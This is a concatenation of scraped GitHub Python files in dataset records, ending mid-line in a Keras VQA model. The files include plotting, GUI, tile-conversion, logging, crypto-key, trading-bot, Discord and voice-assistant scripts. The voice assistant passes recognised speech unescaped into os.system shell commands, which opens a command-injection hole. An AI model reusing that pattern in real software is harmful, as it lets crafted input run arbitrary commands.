figures\nax=fig.add_subplot(1,1,1)\nplt.plot(np.arange(60,80),raiders_win)\nplt.legend(['Win field goal','Win try','Win no score'])\nplt.title('Probability of Raiders Victory')\nplt.xlabel('Time')\n\nfig.savefig('images\\\\vic_probs.png')\n","repo_name":"matthewrunck/NRL_stats","sub_path":"plots.py","file_name":"plots.py","file_ext":"py","file_size_in_byte":18444,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"29438524652","text":"from PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtGui import QColor, QBrush, QIcon\nimport sys\n\nclass BasicTreeWidget(QMainWindow):\n def __init__(self):\n super(BasicTreeWidget, self).__init__()\n self.setWindowTitle('Basic usage of the tree widget (QTreeWidget)')\n\n self.tree = QTreeWidget()\n # Set the number of columns for the tree widget\n self.tree.setColumnCount(2)\n\n # Set the column header labels\n self.tree.setHeaderLabels(['Key', 'Value'])\n\n # Create the root node\n root = QTreeWidgetItem(self.tree)\n root.setText(0, 'Root node')\n root.setIcon(0, QIcon('new.png'))\n self.tree.setColumnWidth(0, 160)\n\n # Create child node 1\n child1 = QTreeWidgetItem(root) # child node of the root node\n child1.setText(0, 'Child node 1')\n child1.setText(1, 'Data of child node 1')\n child1.setIcon(0, QIcon('new.png'))\n child1.setCheckState(0, Qt.Checked) # Add a checkbox\n\n # Create child node 2\n child2 = QTreeWidgetItem(root) # child node of the root node\n child2.setText(0, 'Child node 2')\n child2.setIcon(0, QIcon('new.png'))\n child2.setCheckState(0, Qt.Checked) # Add a checkbox\n\n # Create a child of child node 2\n child3 = QTreeWidgetItem(child2) # child node of child node 2\n child3.setText(0, 'Child node 2-1')\n child3.setText(1, 'Data of child node 2-1')\n child3.setIcon(0, QIcon('new.png'))\n child3.setCheckState(0, Qt.Checked) # Add a checkbox\n\n self.tree.expandAll()\n\n self.setCentralWidget(self.tree)\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n main = BasicTreeWidget()\n main.show()\n\n 
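# hand control to the Qt event loop; exit the process with its return code when the window closes\n 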
sys.exit(app.exec_())\n","repo_name":"royccg/python_tech","sub_path":"pyqt5_tech/代码创建窗口/table_tree/BasicTreeWidget.py","file_name":"BasicTreeWidget.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"5775533387","text":"import numpy as np\nimport PIL.Image\nimport sys\n\nX_FLIP = 0x4000\nY_FLIP = 0x8000\nPAL = 0x1000\n\nim = PIL.Image.open(sys.argv[1])\ntiles = np.array(np.split(np.array(np.split(np.array(im), 28, 0)), 32, 2))\ntilemapRaw = bytearray(32 * 28 * 2)\ntilemap = np.ndarray(shape=(28, 32), dtype='<u2', buffer=tilemapRaw)\ntiledata = [[0] * 64]\n\nfor tid in np.mgrid[:32, :28].reshape(2, -1).T:\n tile = tiles[tuple(tid)]\n tid = tuple(np.flip(tid))\n data = list(tile.flatten())\n try:\n index = tiledata.index(data)\n tilemap[tid] = index | PAL\n continue\n except:\n pass\n\n data = list(np.flip(tile, 0).flatten())\n try:\n index = tiledata.index(data)\n tilemap[tid] = index | PAL | Y_FLIP\n continue\n except:\n pass\n\n data = list(np.flip(tile, 1).flatten())\n try:\n index = tiledata.index(data)\n tilemap[tid] = index | PAL | X_FLIP\n continue\n except:\n pass\n\n data = list(np.flip(np.flip(tile, 0), 1).flatten())\n try:\n index = tiledata.index(data)\n tilemap[tid] = index | PAL | X_FLIP | Y_FLIP\n continue\n except:\n pass\n\n data = list(tile.flatten())\n index = len(tiledata)\n tilemap[tid] = index | PAL\n tiledata.append(data)\n\nchardataRaw = bytearray(len(tiledata) * 32)\n\npalette = np.array(im.getpalette(), np.uint16).reshape(-1, 3)\npalette >>= 3\npalette = palette[:,0] | (palette[:,1] << 5) | (palette[:,2] << 10)\n\nfor i, tile in enumerate(tiledata):\n for y in range(8):\n tileData = [0] * 4\n for x in range(8):\n t = tile[y * 8 + x]\n tileData[0] |= ((t & 1) >> 0) << (7 - x)\n tileData[1] |= ((t & 2) >> 1) << (7 - x)\n tileData[2] |= ((t & 4) >> 2) << (7 - x)\n tileData[3] |= ((t & 8) >> 3) << (7 - x)\n tileBase = i * 32 + y * 2\n chardataRaw[tileBase + 0x00] = tileData[0]\n chardataRaw[tileBase + 0x01] = tileData[1]\n chardataRaw[tileBase + 0x10] = tileData[2]\n chardataRaw[tileBase + 0x11] = tileData[3]\n\ndef printMem(mem):\n for i in range(len(mem) // 16):\n line = mem[i * 16:(i + 1) * 16]\n print('\\t' + ', '.join([f'0x{b:02X}' for b in line]) + ',')\n\nprint('uint16_t palette[] = {');\nfor rgb in palette[:16]:\n print(f'\\t0x{rgb:04X},')\nprint('};')\nprint()\n\nprint('uint8_t tilemap[] = {');\nprintMem(tilemapRaw)\nprint('};')\nprint()\n\nprint('uint8_t chardata[] = {');\nprintMem(chardataRaw)\nprint('};')\n","repo_name":"mgba-emu/mgba","sub_path":"tools/snes-tile.py","file_name":"snes-tile.py","file_ext":"py","file_size_in_byte":2460,"program_lang":"python","lang":"en","doc_type":"code","stars":4880,"dataset":"github-code","pt":"48"} +{"seq_id":"35614266920","text":"from sklearn.model_selection import learning_curve\nimport numpy as np\n\n\ndef compute_learning_curve(estimator, X, y, cv=5):\n train_sizes, train_scores, test_scores = \\\n learning_curve(estimator=estimator,\n scoring='neg_mean_squared_error',\n X=X,\n y=y,\n train_sizes=np.linspace(0.1, 1.0, 11),\n cv=cv,\n n_jobs=1,\n )\n\n train_mean = np.mean(np.sqrt(-train_scores), axis=1)\n train_std = np.std(np.sqrt(-train_scores), axis=1)\n test_mean = np.mean(np.sqrt(-test_scores), axis=1)\n test_std = np.std(np.sqrt(-test_scores), axis=1)\n\n learning_curve_params = {\n 'train_sizes': train_sizes,\n 'train_scores': train_scores,\n 'test_scores': test_scores,\n 'train_mean': train_mean,\n 
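# matching spreads, consumed by plot_learning_curve's shaded error bands\n 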
'train_std': train_std,\n 'test_mean': test_mean,\n 'test_std': test_std\n }\n\n return learning_curve_params\n\n\ndef plot_learning_curve(ax, lc_params):\n ax.plot(lc_params['train_sizes'], lc_params['train_mean'],\n color='blue', marker='o',\n markersize=5, label='training RMSE')\n\n ax.fill_between(lc_params['train_sizes'],\n lc_params['train_mean'] + lc_params['train_std'],\n lc_params['train_mean'] - lc_params['train_std'],\n alpha=0.15, color='blue')\n\n ax.plot(lc_params['train_sizes'], lc_params['test_mean'],\n color='green', linestyle='--',\n marker='s', markersize=5,\n label='validation RMSE')\n\n ax.fill_between(lc_params['train_sizes'],\n lc_params['test_mean'] + lc_params['test_std'],\n lc_params['test_mean'] - lc_params['test_std'],\n alpha=0.15, color='green')\n\n ax.grid()\n ax.set_xlabel('Number of training samples')\n ax.set_ylabel('RMSE')\n ax.legend()\n","repo_name":"W-Tran/advanced-regression-techniques","sub_path":"art/learning_curve.py","file_name":"learning_curve.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43933110834","text":"import logging\nimport logging.handlers\nimport os\nimport pwd\nimport sys\nimport time\n\n\ndef __setuplogging(logfile, loglevel, runAs, console=False):\n\n log = logging.getLogger()\n\n logfile = os.path.expanduser(logfile)\n if logfile == 'syslog':\n logStream = logging.handlers.SysLogHandler('/dev/log')\n elif logfile == 'stdout':\n logStream = logging.StreamHandler()\n else:\n lf = os.path.expanduser(logfile)\n logdir = os.path.dirname(lf)\n if not os.path.exists(logdir):\n os.makedirs(logdir)\n runuid = pwd.getpwnam(runAs).pw_uid\n rungid = pwd.getpwnam(runAs).pw_gid \n os.chown(logdir, runuid, rungid)\n logStream = logging.FileHandler(filename=lf) \n\n FORMAT='%(asctime)s (UTC) [ %(levelname)s ] %(name)s %(filename)s:%(lineno)d %(funcName)s(): %(message)s'\n formatter = logging.Formatter(FORMAT)\n formatter.converter = time.gmtime # to convert timestamps to UTC\n logStream.setFormatter(formatter)\n log.addHandler(logStream)\n\n # adding a new Handler for the console, \n # to be used only for DEBUG and INFO modes. \n if loglevel in [logging.DEBUG, logging.INFO]:\n if console:\n console = logging.StreamHandler(sys.stdout)\n console.setFormatter(formatter)\n console.setLevel(loglevel)\n log.addHandler(console)\n log.setLevel(loglevel)\n log.info('Logging initialized.')\n","repo_name":"jose-caballero/toolbox","sub_path":"log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6587994080","text":"import logging\nimport telegram\nfrom telegram.ext import Updater, CommandHandler, MessageHandler, Filters\nimport kucoin\n\n# Initialize Kucoin client\nkucoin_client = kucoin.Client(api_key='your_api_key', api_secret='your_api_secret')\n\n# Enable logging\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n level=logging.INFO)\n\nlogger = logging.getLogger(__name__)\n\n# Define Telegram bot\ndef start(update, context):\n update.message.reply_text('Hi! I am a bot that receives signal messages and places trades on Kucoin. 
Send me a signal message to get started.')\n\ndef process_signal_message(update, context):\n message = update.message.text\n # Parse the signal message\n tokens = message.split()\n symbol = tokens[0].strip('$').split('/')[0]\n if tokens[1].strip().lower() != 'buy':\n update.message.reply_text('Invalid signal message: expected \"Buy\".')\n return\n buy_prices = [float(price.strip()) for price in tokens[2].split('-')]\n if tokens[3].strip().lower() != 'sell':\n update.message.reply_text('Invalid signal message: expected \"Sell\".')\n return\n sell_prices = [float(price.strip()) for price in tokens[4].split('-')]\n if tokens[5].strip().lower() != 'sl':\n update.message.reply_text('Invalid signal message: expected \"SL\".')\n return\n stop_loss = float(tokens[6].strip())\n # Place a market buy order\n response = kucoin_client.create_order(symbol=symbol, side='buy', type='market')\n if response.get('success'):\n update.message.reply_text(f'Market buy order for {symbol} placed successfully.')\n else:\n update.message.reply_text(f'Failed to place market buy order for {symbol}: {response.get(\"msg\")}')\n\ndef error(update, context):\n logger.warning('Update \"%s\" caused error \"%s\"', update, context.error)\n\ndef main():\n updater = Updater(\"your_telegram_bot_token\", use_context=True)\n\n dp = updater.dispatcher\n\n dp.add_handler(CommandHandler(\"start\", start))\n dp.add_handler(MessageHandler(Filters.text, process_signal_message))\n dp.add_error_handler(error)\n\n updater.start_polling()\n\n updater.idle()\n\nif __name__ == '__main__':\n main()\n","repo_name":"arnob016/PyClass","sub_path":"Quiz 3D OOP2/new.py","file_name":"new.py","file_ext":"py","file_size_in_byte":2203,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"48"} +{"seq_id":"14087870187","text":"import discord\nfrom discord.ext import commands\n\n\nclass RHP(commands.Cog):\n\n def __init__(self, client):\n self.client = client\n\n @commands.command(aliases=['RHP', 'rippe', 'Rippe'])\n async def rhp(self, ctx):\n await ctx.send('Rippe Has Problems!')\n\n\ndef setup(client):\n client.add_cog(RHP(client))\n","repo_name":"itZzosku/Telemetry-Discord-Bot","sub_path":"cogs/RHP.py","file_name":"RHP.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"14961143630","text":"import math\nimport os\nimport random\nimport re\nimport sys\n\n#\n# Complete the 'plusMinus' function below.\n#\n# The function accepts INTEGER_ARRAY arr as parameter.\n#\n\ndef plusMinus(arr):\n \n total_count = len(arr)\n pos_count = len([element for element in arr if element > 0])\n neg_count = len([element for element in arr if element < 0])\n zero_count = len([element for element in arr if element == 0])\n \n proportion_arr = [float(pos_count)/float(total_count), float(neg_count)/float(total_count), float(zero_count)/float(total_count)]\n \n for prop_arr in proportion_arr:\n print(\"{:.6f}\".format(prop_arr))\n \n \n \n\nif __name__ == '__main__':\n n = int(raw_input().strip())\n\n arr = map(int, raw_input().rstrip().split())\n\n plusMinus(arr)\n \n ","repo_name":"mogul27/HackerRankSolutions","sub_path":"Algorithms_Python/PlusMinus/PlusMinus.py","file_name":"PlusMinus.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5227830549","text":"import os\nimport shutil\nfrom utils.FileDeal import delete_and_create_dir\nfrom 
utils.Path import dataset_path\n\n# dataset_path = r\"D:\\ML\" # dataset root path\n\n\n# Create a small custom dataset of your own\ndef custom_dataset(path, target_path, number=50):\n dirs_name = os.listdir(path) # list the class folder names under path\n for dir_name in dirs_name:\n dir_path = path + '/' + dir_name # join the path of each class folder under path\n files_name = os.listdir(dir_path) # list the file names inside the class folder\n print(dir_name)\n os.mkdir(target_path + '/' + dir_name) # create the matching class folder under the target directory\n for file_name in files_name[:number]: # take only the first 'number' files of each class folder\n file_path = dir_path + '/' + file_name\n shutil.copy(file_path, target_path + '/' + dir_name) # copy the source file into the target folder\n print(\"Run complete\")\n\n\n# Build the custom training set\ndef custom_train_dataset(path=dataset_path, number=50):\n target_path = path + '/t_train'\n delete_and_create_dir(target_path)\n custom_dataset(path=path+'/train', target_path=target_path, number=number)\n\n\n# Build the custom test set\ndef custom_test_dataset(path=dataset_path, number=50):\n target_path = path + '/t_test'\n delete_and_create_dir(target_path)\n custom_dataset(path=path+'/test', target_path=target_path, number=number)\n\n\nif __name__ == \"__main__\":\n custom_train_dataset()\n custom_test_dataset()\n","repo_name":"water75/ML","sub_path":"utils/CustomDataset.py","file_name":"CustomDataset.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32154873125","text":"import pyttsx3\nimport os\nimport smtplib\nimport datetime\nimport wikipedia\nimport webbrowser\nimport speech_recognition as sr\n\nengine = pyttsx3.init('sapi5')\nvoice = engine.getProperty('voices')\nengine.setProperty('voice',voice[0].id)\n\ndef speak(audio):\n engine.say(audio)\n engine.runAndWait()\n\ndef WishMe():\n hour = datetime.datetime.now().hour\n if 0<=hour<12:\n speak(\"Good Morning, Sir\")\n elif 12<=hour<18:\n speak(\"Good Afternoon, Sir\")\n else:\n speak(\"Good Evening, Sir\")\n speak(\"I'm virtual assistant!\")\n speak(\"I can help you to put email to your friend, I can answer your any question, Tell me to open browser or Office software, it is not only this, I can do more than this.\")\n speak(\"Hi Sir, I'm Aprth, How can I help you?\")\n\n\ndef takecommand():\n #take a command from the microphone and return it as a string\n r = sr.Recognizer()\n with sr.Microphone() as source:\n print(\"Listening...\")\n r.pause_threshold = 0.8\n r.energy_threshold = 850\n audio = r.listen(source)\n\n try:\n print(\"Recognizing...\")\n query = r.recognize_google(audio, language=\"en-in\")\n print(f\"You said: {query}\\\\n\")\n except Exception as e:\n print(\"Can't get it, Can you be specific ?\")\n return \"None\"\n return query\n\n\nif __name__ == '__main__':\n WishMe()\n flag = True\n while flag:\n query = takecommand().lower()\n try:\n if \"wikipedia\" in query:\n speak(\"Searching Wikipedia...\")\n query = query.replace(\"wikipedia\",'')\n answer = wikipedia.summary(query,sentences=3)\n speak(\"According to My Data...\")\n print(answer)\n speak(answer)\n\n if \"who is\" in query:\n speak(\"Searching Wikipedia...\")\n query = query.replace(\"who is\",'')\n answer = wikipedia.summary(query,sentences=3)\n speak(\"According to My Data...\")\n print(answer)\n speak(answer)\n\n if \"tell me about\" in query:\n speak(\"Searching Wikipedia...\")\n query = query.replace(\"tell me about\",'')\n answer = wikipedia.summary(query,sentences=3)\n speak(\"According to My Data...\")\n print(answer)\n speak(answer)\n except:\n pass\n if 'open' in query:\n 
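# strip the leading verb and treat the rest of the phrase as a site name\n query = 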
query.replace('open ','')\n webbrowser.open(query+\".com\")\n\n if 'search google' in query:\n query = query.replace('search google ','')\n os.system(f\"start \\\"\\\" https://www.google.com/search?q={query}&source=lnms&tbm=nws\")\n\n if 'google' in query:\n query = query.replace('google ','')\n print(query)\n os.system(f\"start \\\"\\\" https://www.google.com/search?q={query}&source=lnms&tbm=nws\")\n\n if 'youtube' in query:\n query = query.replace('youtube ','')\n os.system(f\"start \\\"\\\" https://www.youtube.com/results?search_query={query}\")\n\n if 'say about' in query:\n query = query.replace('say about ','')\n webbrowser.open(query+\".com\")\n\n if 'play music' in query:\n music_dir = \"enter your music directory path\"\n song = os.listdir(music_dir)\n os.startfile(os.path.join(music_dir,song[0]))\n\n if 'time' in query:\n strtime = datetime.datetime.now().strftime(\"%H:%M:%S\")\n print(strtime)\n speak(f\"Sir, The Time is {strtime}\")\n\n if 'show me powerpoint' in query:\n path = \"C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Office16\\\\POWERPNT.EXE\"\n os.startfile(path)\n\n if 'show me firefox' in query:\n path = \"C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe\"\n os.startfile(path)\n\n if 'show me movie' in query:\n path = \"Enter movie's absolute path here\"\n os.startfile(path)\n\n \n\n if 'goodbye' in query:\n speak(\"Goodbye Sir, Nice to talk you, meet you soon!\")\n flag = False\n","repo_name":"parth2050/Voice_assistant","sub_path":"code/voice_assist.py","file_name":"voice_assist.py","file_ext":"py","file_size_in_byte":4206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4594018069","text":"import os\r\nos.system(\"cls\")\r\n\r\n#Datos de entrada:\r\ntotalCompra = float(input(\"Monto total de la compra ($): \"))\r\n\r\n#Proceso: Evaluar totalCompra y luego determinar el préstamo y fondo propio.\r\nif totalCompra > 5000:\r\n prestamo = 30 / 100 * totalCompra\r\nelse: prestamo = 20 / 100 * totalCompra\r\n\r\ninteres = 10 / 100 * prestamo\r\npropio = totalCompra - prestamo\r\n\r\n#Resultado:\r\nprint(\"-----Pagos-----\")\r\nprint(f'Préstamo Banco : {prestamo:.2f} soles')\r\nprint(f'Fondos propios : {propio:.2f} soles')\r\nprint(\"-----Gastos-----\")\r\nprint(f'Intereses bancarios: {interes:.2f} soles')","repo_name":"LeoEstaProgramando/Varios","sub_path":"02.Problemas-EstructurasCondicionales/26.py","file_name":"26.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"1549817765","text":"import os\nimport logging\n\nfrom cryptography.hazmat.primitives import padding\nfrom cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes\nfrom cryptography.hazmat.primitives.asymmetric import rsa, padding\nfrom cryptography.hazmat.primitives import hashes\n\n\nlogger = logging.getLogger()\nlogger.setLevel('INFO')\n\n\ndef generate_asym_data() -> tuple:\n \"\"\"\n Функция генерирует ключи для асимметричного шифрования\n :return: закрытый ключ и открытый ключ\n \"\"\"\n keys = rsa.generate_private_key(public_exponent=65537, key_size=2048)\n secret_key = keys\n public_key = keys.public_key()\n logging.info(' Key generated for asymmetric encryption')\n return secret_key, public_key\n\n\ndef generate_sym_data(len: int) -> str:\n \"\"\"\n Функция генерирует ключ для симметричного шифрования\n :param len: длина ключа\n :return: ключ \n \"\"\"\n key = None\n choices = [128, 192, 256]\n if len in 
choices:\n key = os.urandom(int(len / 8))\n logging.info(' Symmetric encryption key generated')\n else:\n logging.warning(' The length of the key is not in choices: {}'.format(choices))\n raise ValueError(f'The length of the key {len} is not allowed')\n return key ","repo_name":"PolinaKrp/isb-3","sub_path":"scripts/generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"ru","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"10905328494","text":"# Uses python3\r\ncount = 0\r\n\r\ndef merge_sort(a):\r\n if len(a) == 1:\r\n return a\r\n \r\n m = len(a) // 2\r\n \r\n b = merge_sort(a[:m])\r\n c = merge_sort(a[m:])\r\n \r\n return merge(b, c)\r\n \r\ndef merge(b, c):\r\n d = []\r\n \r\n while b and c:\r\n if b[0] <= c[0]:\r\n d.append(b[0])\r\n del b[0]\r\n else:\r\n d.append(c[0])\r\n del c[0]\r\n increment_count(len(b))\r\n \r\n d.extend(b)\r\n d.extend(c)\r\n \r\n return d\r\n\r\ndef increment_count(n):\r\n global count\r\n count = count + n\r\n \r\nif __name__ == '__main__':\r\n a = list(map(int, input().split()))\r\n merge_sort(a)\r\n print(count)","repo_name":"rcurran1221/Algorithmic_Toolbox","sub_path":"merge_sort.py","file_name":"merge_sort.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33684401677","text":"import os\nfrom os.path import join\nfrom os import makedirs\nfrom itertools import product\nfrom time import sleep\nfrom math import pi\nimport numpy as np\n\nfrom psbody.mesh import Mesh, MeshViewer\nfrom psbody.mesh.sphere import Sphere\nfrom psbody.mesh.colors import name_to_rgb\n\nimport humplate.config as cg\nfrom humplate.utils.bone_tools import get_plane_frames_from_humerus\nfrom humplate.utils.draw import plane_frames_2_mesh_lines\nfrom humplate.utils.geometry import rotate\nimport humplate.templates.bone_annotation as ba\n\nimport argparse\nimport logging\n\nlogging.basicConfig(level=logging.INFO)\n\n\ndef _create_cage(vs, radius=1e-2):\n ''' Given an array of 3d vertices, it creates a *cage* containing all given vertices inside.\n The output are a set of spheres with the \"corners\" of the bounding box of the points.\n \n :param vs: an array of 3d points\n :returns: an array of eight spheres, creating a *cage*\n '''\n\n return([Sphere(np.asarray(corner), radius=radius).to_mesh()\n for corner in product(*zip(vs.min(axis=0), vs.max(axis=0)))])\n\n\ndef _create_cage_from_meshes(meshes, radius=1e-2):\n ''' Given an iterable with meshes, their vertices are concatenated\n and a cage is created using :func:`create_cage`.\n\n :param meshes: an iterable with meshes\n :type meshes: Mesh\n :returns: an array of eight spheres, creating a *cage*\n\n .. 
seealso:: :func:`create_cage`\n '''\n \n cage_v = np.zeros([0, 3])\n for m in meshes:\n cage_v = np.vstack((cage_v, m.v))\n\n return _create_cage(cage_v, radius=radius)\n\n\ndef visualize_pca_space(B, M, f, output_dir, annotation_filename='', heatmap=False, anatomical_annotation_mesh=False):\n '''\n Move across principal components and visualize\n :param B: Basis vectors\n :param M: Mean vector\n :param f: Faces of the template mesh\n :param output_dir: Folder containing the snapshots\n :return:\n '''\n print('Saving pca space visualization at ' + output_dir)\n\n if os.path.exists(output_dir):\n from shutil import rmtree\n rmtree(output_dir)\n # raise IOError('Output directory' + output_dir + ' already exists!')\n makedirs(output_dir)\n\n mv = MeshViewer()\n mv.set_background_color(np.asarray([1.0, 1.0, 1.0]))\n\n # camera orientations\n if not heatmap:\n camera_orientations = {\n 'top': [pi / 2, 0, 0.], \n 'side': [pi, 0., pi], \n 'front': [0., pi / 2, 0.],\n }\n else :\n camera_orientations = {\n 'side': [pi/2, 0, 0.], \n 'head': [pi/5, 0, 0], \n 'front': [0., pi / 2, 0.],\n }\n\n\n step = 0.2\n limits = [-2., 2.]\n colors = ['bisque', 'lavender', 'honeydew', 'gray']\n\n\n for ci, orientation in enumerate(camera_orientations):\n if not os.path.exists(os.path.join(output_dir, orientation)):\n makedirs(os.path.join(output_dir, orientation))\n\n mean_shape = Mesh(v=rotate(M, camera_orientations[orientation]))\n img_num = 0\n\n # iterate over pca components\n for b in range(3): # B.shape[0]):\n mv.set_background_color(name_to_rgb[colors[b % len(colors)]])\n\n # collect all the meshes to generate a cage (to avoid zoom effects in the viewer)\n meshes = []\n lines = []\n for k in (list(np.arange(limits[0], limits[1], step)) + list(np.arange(limits[1], limits[0], -step))) :\n m = Mesh(v=M + k * B[:, :, b], f=f, vc=[0.7, 0.7, 0.7])\n\n if anatomical_annotation_mesh:\n m.vc=anatomical_annotation_mesh.vc\n if annotation_filename and args.heatmap:\n annotated_points = ba.apply_annotations(m, annotation_filename)\n _, rms_dico = ba.compute_local_frame_lines(annotated_points)\n if heatmap :\n ba.annotate_heatmap(m, annotated_points, rms_dico)\n plane_dict = get_plane_frames_from_humerus(annotated_points, m)\n mesh_lines = plane_frames_2_mesh_lines(plane_dict)\n\n for l in mesh_lines:\n l.v = rotate(l.v, camera_orientations[orientation])\n lines.append(mesh_lines)\n m.v = rotate(m.v, camera_orientations[orientation])\n meshes.append(m)\n\n\n mv.static_meshes = _create_cage_from_meshes(meshes, radius=0.0005)\n\n # iterate over steps of std dev\n for i, m in enumerate(meshes):\n if not heatmap:\n mv.dynamic_meshes = [m] + [mean_shape]\n else:\n mv.dynamic_meshes = [m]\n if len(lines)==len(meshes):\n mv.set_dynamic_lines(lines[i])\n sleep(0.02)\n\n mv.save_snapshot(blocking=True, path=join(output_dir, orientation, '{n:03d}.png'.format(n=img_num)))\n img_num += 1\n\n # Generate a video from the saved frames\n cmd_orientation = 'ffmpeg -i {1}/%03d.png -vcodec h264 -pix_fmt yuv420p -r 30 -an -b:v 5000k {2}.mp4'.format(20, join(output_dir, orientation), join(output_dir, orientation))\n print(cmd_orientation)\n\n cmd = ['ffmpeg', '-framerate', '20', '-i', '{0}/%03d.png'.format(join(output_dir, orientation)), '-vcodec',\n 'h264', '-pix_fmt', 'yuv420p', '-r', '30', '-an', '-b:v', '5000k', '{0}.mp4'.format(join(output_dir, orientation))]\n\n print(cmd)\n from subprocess import call\n call(cmd)\n\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-b\", \"--bone_id\", 
help=\"the bone ID to work with\", default='humerus', type=str)\n parser.add_argument(\"-H\", \"--heatmap\", action='store_true', help='Fit a plate to the fixation area and show the distance to this plane')\n parser.add_argument(\"-A\", \"--anat\", action='store_true', help='Paint the meshes with the anatomical zones anotations')\n\n args = parser.parse_args()\n\n output_filename = cg.humerus_template\n pca_filename = cg.humerus_pca \n\n # Load the PCA\n from pickle import load\n pca_dict = load(open(pca_filename, 'rb'), encoding='latin1')\n B = pca_dict['B']\n M = pca_dict['M']\n\n faces = Mesh(filename=output_filename).f\n\n video_output_dir = os.path.join(cg.output_folder, 'pca_video')\n makedirs(video_output_dir, exist_ok=True)\n\n if args.heatmap:\n video_output_dir = os.path.join(video_output_dir, 'planes_heatmap')\n anatomical_annotation_mesh = False\n elif args.anat:\n anatomical_annotation_mesh = Mesh(filename=cg.anatomical_annotation_mesh)\n video_output_dir = os.path.join(video_output_dir, 'anatomic')\n else :\n video_output_dir = os.path.join(video_output_dir, 'pca_space')\n anatomical_annotation_mesh = False\n\n makedirs(video_output_dir, exist_ok=True)\n\n visualize_pca_space(B, M, faces, output_dir=video_output_dir, annotation_filename=cg.template_annotation,\n heatmap=args.heatmap, anatomical_annotation_mesh=anatomical_annotation_mesh)\n \n print('Videos saved at ' + video_output_dir)","repo_name":"MarilynKeller/HumerusPlate","sub_path":"demos/plot_pca.py","file_name":"plot_pca.py","file_ext":"py","file_size_in_byte":7135,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"8644996671","text":"import spacy\nimport numpy as np\nimport collections\nimport operator\nimport json\n\nfrom utils import preprocess_data, topKFrequentAnswer, getVoc, ltocsv, csvtol\nfrom features_processor import question_features, batch, atot, qtot, itot, getEmbeddings, qtotIndex\n\n\nprint('loading datas...')\n# Load the training data\ndata_question = json.load(open('Questions/OpenEnded_mscoco_train2014_questions.json')) # remove v2_\ndata_answer = json.load(open('Annotations/mscoco_train2014_annotations.json')) # remove v2_\n\n# load the validation data\ndata_qval = json.load(open('Questions/OpenEnded_mscoco_val2014_questions.json')) # remove v2_\ndata_aval = json.load(open('Annotations/mscoco_val2014_annotations.json')) # remove v2_\nprint('data loaded')\n\n\nK_train_dict, K_val_dict, topKAnswers = topKFrequentAnswer(data_question, data_answer, data_qval, data_aval)\n\nK_images_id, K_questions_id, K_questions, K_questions_len, K_answers = K_train_dict['images_id'], K_train_dict['questions_id'], K_train_dict['questions'], K_train_dict['questions_len'], K_train_dict['answers']\nK_images_val_id, K_questions_val_id, K_questions_val, K_questions_val_len, K_answers_val = K_val_dict['images_id'], K_val_dict['questions_id'], K_val_dict['questions'], K_val_dict['questions_len'], K_val_dict['answers']\n\nvocabulary = getVoc(K_questions, K_questions_val)\nembedding_matrix = getEmbeddings(vocabulary)\n\n# ----------------------------------------- Create the model ----------------------------------------- #\n\nimg_dim = 2048 # TODO: change for 4096\nword2vec_dim = 300\nhidden_layers = 2\n\nmerge_hidden_units = 1024\nq_hidden_units = 512\nmlp_hidden_units = 1000\n\nvoc_size = len(vocabulary) # number of unique words from training + validation questions\nmax_len = max(max(K_questions_len), max(K_questions_val_len)) + 1 # max number of words per 
question\ndropout = 0.5\nactivation = 'tanh'\nnb_classes = len(topKAnswers) # 1000\n\nfrom random import shuffle\nfrom keras import optimizers\nfrom keras.models import Sequential, Model\nfrom keras.layers.core import Dense, Dropout, Activation\nfrom keras.layers.recurrent import LSTM\nfrom keras.layers import multiply\nfrom keras import regularizers\n\nfrom keras.layers import *\n\n# image model\ni_model = Sequential()\ni_model.add(Dense(merge_hidden_units, input_shape=(img_dim,)))\ni_model.add(Activation(activation))\n#i_model.add(Dropout(dropout))\n\n\n# question model\nq_model = Sequential()\nq_model.add(Embedding(voc_size, word2vec_dim, weights=[embedding_matrix], input_length=max_len, trainable=False))\nq_model.add(LSTM(units=q_hidden_units, return_sequences=True, input_shape=(max_len, word2vec_dim)))\nq_model.add(Dropout(dropout))\nq_model.add(LSTM(q_hidden_units, return_sequences=False))\nq_model.add(Dropout(dropout))\nq_model.add(Dense(merge_hidden_units))\nq_model.add(Activation(activation))\n\n\n# Merging\n# add embedding\nmerge_model = Multiply()([i_model.output, q_model.output])\nfor i in range(hidden_layers):\n merge_model = (Dense(mlp_hidden_units,))(merge_model)\n merge_model = (Activation(activation))(merge_model)\n merge_model = (Dropout(dropout))(merge_model)\n\nmerge_model = 